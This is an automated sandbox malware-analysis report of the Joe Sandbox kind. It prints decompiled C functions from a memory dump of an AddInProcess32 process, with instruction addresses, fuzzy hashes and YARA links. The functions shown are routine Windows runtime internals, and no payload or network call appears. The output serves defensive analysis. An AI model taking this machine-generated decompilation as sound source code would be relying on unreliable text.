								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1948724; // 0x0
					return E01908DF1(__ebx, 0xc0000374, 0x1945890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01912076
0x01912078
0x0191207d
0x01912083
0x019120a4
0x019120aa
0x019120ac
0x019120b7
0x019120ba
0x019120bc
0x019120c9
0x019120c9
0x019120d0
0x019120d2
0x00000000
0x019120d2
0x019120be
0x019120c3
0x019120c5
0x019120c7
0x00000000
0x00000000
0x019120c7
0x019120bc
0x019120d4
0x01912085
0x01912085
0x019120a3
0x019120a3

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6daf7c29f1ba64edc3c21e2da19f65c7c1af122432d35e2c3f568f117dc6c9a
Instruction ID: d43aebc16199ef6c0b419e706eb92be3f5c41c5f6fa87b9f0f1809830b33333f
Opcode Fuzzy Hash: c6daf7c29f1ba64edc3c21e2da19f65c7c1af122432d35e2c3f568f117dc6c9a
Instruction Fuzzy Hash: 1EF0A07E81A28D4BEE33BB786111AE17B9AD795211B2A0585D5A81720EC93889D3CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0189927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0189927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0189FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E018992C6(_t11, _t14);
				}
				return _t11;
			}

0x01899295
0x01899299
0x0189929f
0x018992aa
0x018992ad
0x018992ae
0x018992af
0x018992b0
0x018992b4
0x018992bb
0x018992bb
0x018992c5

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: dfdf88992325251d2b564388d499c5413fe2891f4d469db30151a86e35fb4786
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 84E02B323405016BEB119E4DCC80F03379DDF92724F0440BCF5009E242C6E5DE0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 01928D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01928D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x194d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01877D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0189B640(E01899AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x01928d34
0x01928d43
0x01928d4b
0x01928d4e
0x01928d52
0x01928d5c
0x01928d6e
0x01928d5e
0x01928d67
0x01928d67
0x01928d79
0x01928d7a
0x01928d7c
0x01928d81
0x01928d94

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cdebd796eb7b1e124afe1f7b11ec27d5eadbc6f188fe9ed64070669a7f01163
Instruction ID: fc39a3e3f56cc0995c60c693a49fc9a3d2521edf8326716c5b71182c6cbadbd1
Opcode Fuzzy Hash: 2cdebd796eb7b1e124afe1f7b11ec27d5eadbc6f188fe9ed64070669a7f01163
Instruction Fuzzy Hash: 67F0B470E046189FDB14EFBCD445E6E77F4EF14700F148099E905EB280EA34DA00C755

Uniqueness

Uniqueness Score: -1.00%

Function 01928B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01928B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x194d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01877D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0189B640(E01899AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01928b67
0x01928b6f
0x01928b72
0x01928b7d
0x01928b8f
0x01928b7f
0x01928b88
0x01928b88
0x01928b9a
0x01928b9b
0x01928b9d
0x01928ba2
0x01928bb5

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2f1066fd0e3402231cb4d5d38d9f93f83a837ac47df0c3990eafc69b67b41c
Instruction ID: a1671441b837a92f664ef01982a47714ccb697f23f510520f22f182da33d50a8
Opcode Fuzzy Hash: ec2f1066fd0e3402231cb4d5d38d9f93f83a837ac47df0c3990eafc69b67b41c
Instruction Fuzzy Hash: B4F082B0A04259ABDF14EBACD906E7E77F8EF14704F040459FA05DB380EA34DA00C799

Uniqueness

Uniqueness Score: -1.00%

Function 01928CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01928CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x194d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01877D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0189B640(E01899AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01928ce5
0x01928ced
0x01928cf0
0x01928cfb
0x01928d0d
0x01928cfd
0x01928d06
0x01928d06
0x01928d18
0x01928d19
0x01928d1b
0x01928d20
0x01928d33

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d1c55423f92f6b683dc9a2e2fae751efa0fbd70b81d21620f2201b293d6603
Instruction ID: 19f4cfaa681c6bc92342ef1784b2c43d119537c795303e684a9f88ca0c8aa85e
Opcode Fuzzy Hash: a3d1c55423f92f6b683dc9a2e2fae751efa0fbd70b81d21620f2201b293d6603
Instruction Fuzzy Hash: CBF08270A05259ABDF04DBACE945E6E77F8EF18304F140199E915EB280EA34EA04C755

Uniqueness

Uniqueness Score: -1.00%

Function 0187746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0187746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0186EB70(__ecx, 0x19479a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E018995D0();
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0187746d
0x0187746d
0x0187746d
0x01877471
0x01877488
0x018bf92d
0x0187748e
0x01877491
0x01877495
0x018bf937
0x018bf93a
0x018bf94e
0x018bf953
0x018bf956
0x018bf956
0x01877495
0x00000000
0x01877488
0x01877473
0x01877478
0x0187747d
0x01877481
0x00000000
0x01877481
0x0187747d
0x0187747a
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8c5926984e955335e87b213cda5c48ed2fc69a7fc4acb4868ccd318e926309
Instruction ID: 8de27306e43c59addbe6a0f14513c852eb90ed4691b546b9837c3a5afcd87cc1
Opcode Fuzzy Hash: fe8c5926984e955335e87b213cda5c48ed2fc69a7fc4acb4868ccd318e926309
Instruction Fuzzy Hash: FFF0BE39900149AADF029B6CC8C4BBABFB1AF14358F080219D951EB161E725DA01C7C6

Uniqueness

Uniqueness Score: -1.00%

Function 01854F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01854F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E019288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0187C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1831030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x01854f2e
0x01854f34
0x01854f38
0x018b0b85
0x018b0b85
0x018b0b89
0x018b0b9a
0x018b0b9a
0x018b0b9f
0x00000000
0x018b0b9f
0x018b0b94
0x018b0b98
0x00000000
0x00000000
0x00000000
0x018b0b98
0x01854f3e
0x01854f48
0x00000000
0x01854f6e
0x00000000
0x01854f70

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10377932ca09831eefbcb54a1c35fb7da24e852203da2c32fe14b18fe91027b7
Instruction ID: 6548238c271a16a52590eb90c5af746a2c2028d4db91a10d5f75e2f13b28ce0d
Opcode Fuzzy Hash: 10377932ca09831eefbcb54a1c35fb7da24e852203da2c32fe14b18fe91027b7
Instruction Fuzzy Hash: C8F0BE325257958FD772CB5CC1C4FA3B7E4AB00778F444464E405C7A22D724EA84C680

Uniqueness

Uniqueness Score: -1.00%

Function 0188A44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0188A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1947b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0189FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0188a44b
0x0188a453
0x0188a472
0x0188a476
0x00000000
0x0188a493
0x0188a47a
0x0188a47f
0x0188a486
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f5430f09975cada7567f7659c4913d9c2ae5180181005cbae6372d467b2285
Instruction ID: e4a25b9e9b4e01dba9a681ba723894b4a7f1cecb2562d27fe42f107e633c9b73
Opcode Fuzzy Hash: e3f5430f09975cada7567f7659c4913d9c2ae5180181005cbae6372d467b2285
Instruction Fuzzy Hash: 75E092B2A01421ABD7266A5CAC40F66779DDBE4755F0D4035F604E7264D628DE01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0185F358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0185F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0188F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01874620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0185f35d
0x0185f361
0x0185f367
0x0185f372
0x0185f38c
0x0185f38c
0x0185f394

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: db51eaafbe0e95842516d9a8f1bb892796a5794b5740a9090fd4c2f65c96bcd1
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 46E0DF32A42118FBEB61AADD9E05FAABFACDB58B60F000195BF04D7151D5609F40C2D1

Uniqueness

Uniqueness Score: -1.00%

Function 0186FF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0186FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x18311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E019288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01870050(_t14);
				}
			}

0x0186ff66
0x0186ff6b
0x00000000
0x0186ff8f
0x00000000
0x0186ff8f

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112c01b4fcd39e5cfcd61cc086c9a77d0f8b992234cc1d4bb572fe77a876a0ac
Instruction ID: 089ef76b6a710342f44c6296dfc42af9b58943d2b4462982574ff252a489db7f
Opcode Fuzzy Hash: 112c01b4fcd39e5cfcd61cc086c9a77d0f8b992234cc1d4bb572fe77a876a0ac
Instruction Fuzzy Hash: F7E0DFB02052049FD736DB59F060F293B9CAB92721F19801DE208CB102CE21DA80C286

Uniqueness

Uniqueness Score: -1.00%

Function 018E41E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E018E41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x19308f0);
				_t5 = E018AD08C(__ebx, __edi, __esi);
				if( *0x19487ec == 0) {
					E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x19487ec == 0) {
						 *0x19487f0 = 0x19487ec;
						 *0x19487ec = 0x19487ec;
						 *0x19487e8 = 0x19487e4;
						 *0x19487e4 = 0x19487e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L018E4248();
				}
				return E018AD0D1(_t5);
			}

0x018e41e8
0x018e41ea
0x018e41ef
0x018e41fb
0x018e4206
0x018e420b
0x018e4216
0x018e421d
0x018e4222
0x018e422c
0x018e4231
0x018e4231
0x018e4236
0x018e423d
0x018e423d
0x018e4247

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1faae1c735ca243ab53d7720e05a471297f15b0b44da025f3af602ce95b3639e
Instruction ID: acc302319e1afe20d74a0d680a5b31c2fe1ded20dc59d0d3409b4380a01ed34e
Opcode Fuzzy Hash: 1faae1c735ca243ab53d7720e05a471297f15b0b44da025f3af602ce95b3639e
Instruction Fuzzy Hash: 75F01578894701CFDBB0EFE99524B283AE4F794312F40411AD108C7A88D73446A0CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0190D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0190D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0185E8B0(__ecx, _a4, 0xfff);
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0190d38a
0x0190d39b
0x0190d3b1
0x00000000
0x0190d3b6
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: fd1add3851936e184b1d06a49467c1b125e3777bd6a8f34283c3463204ba3bdb
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: F7E0C231280209BBDB235E88CC00F69BB9ADB507A5F104031FE089A6D0C671DE91D6C4

Uniqueness

Uniqueness Score: -1.00%

Function 0188A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0188A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x19467e4 >= 0xa) {
					if(_t5 < 0x1946800 || _t5 >= 0x1946900) {
						return L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01870010(0x19467e0, _t5);
				}
			}

0x0188a190
0x0188a1a6
0x0188a1c2
0x00000000
0x00000000
0x00000000
0x0188a192
0x0188a192
0x0188a19f
0x0188a19f

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b0af1ea7a3db892370249b09e94e40c5530e22c092425e7e0e6e554e88ae87
Instruction ID: 48e36c38b494e40e84a9f599a163e3c1f5e408909e61c99e336ab2448d8baf22
Opcode Fuzzy Hash: 03b0af1ea7a3db892370249b09e94e40c5530e22c092425e7e0e6e554e88ae87
Instruction Fuzzy Hash: B2D02BF516060057C72D7304C914F257252F781B64F34040EF20BCB9D0E954CDD1E109

Uniqueness

Uniqueness Score: -1.00%

Function 018816E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018816E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01881710(0x19467e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01874620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x018816e8
0x018816ef
0x018816f3
0x018816fe
0x00000000
0x01881700
0x0188170d
0x0188170d
0x018816f2
0x018816f2
0x018816f2
0x018816f2

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46f59813791d3413e60a152eb94c286df1de654d327d7aa8723178f6361b01b6
Instruction ID: f772fad337dee71563c71a28444fe903499d424177268ce79c5be33d07d709c8
Opcode Fuzzy Hash: 46f59813791d3413e60a152eb94c286df1de654d327d7aa8723178f6361b01b6
Instruction Fuzzy Hash: 83D0A7711102019AEA2DBB189808B143651EF90785F38005CF20BC98C0CFA0CED3E048

Uniqueness

Uniqueness Score: -1.00%

Function 018D53CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018D53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0186EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x018d53ca
0x018d53ce
0x018d53d9
0x018d53de
0x018d53e1
0x018d53e1
0x018d53e6
0x018d53f3
0x00000000
0x018d53f8
0x018d53fb

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: a94428b71a4c0b1d011525268c07d3f09af2ea6703d51f375b95975efc5545ab
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: EFE08C319007849BCF16DB4CC690F4EBBF9FB45B40F140004A108AB620CA35EE00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0186AAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0186AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0186aab6
0x0186aabb
0x018ba442
0x00000000
0x018ba448
0x018ba454
0x018ba454
0x0186aac1
0x0186aac1
0x0186aac6
0x0186aac6

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: de30568db8fc4fdcf42c6dea65b34d16373faa7e979cacfe1f389b3de211d38d
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 22D0E939352980CFD61BCB1DC594B5577A8BB44B45FC504A0E501CB762E62CDA44CA10

Uniqueness

Uniqueness Score: -1.00%

Function 018835A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018835A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0186EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x018835a1
0x018835a1
0x018835a5
0x018835ab
0x018835ab
0x018835b5
0x00000000
0x018835c1
0x018835b7

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

